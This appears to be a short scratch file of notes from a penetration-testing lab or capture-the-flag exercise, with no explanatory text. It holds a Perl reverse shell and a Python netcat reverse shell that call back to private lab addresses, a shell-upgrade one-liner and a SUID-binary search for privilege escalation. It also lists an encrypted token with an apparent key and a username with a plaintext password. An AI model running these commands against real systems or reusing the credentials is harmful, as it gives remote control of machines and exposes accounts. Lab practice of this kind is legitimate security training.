python -c 'import pty;pty.spawn("/bin/bash")'


perl 
perl -e 'use Socket;$i="192.168.49.55";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'




gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

lucy:wJ9`"Lemdv9[FEw-

__import__("os").system("nc 192.168.49.90 443 -e /bin/sh");

.hannah

find / -perm -u=s -type f 2>/dev/null

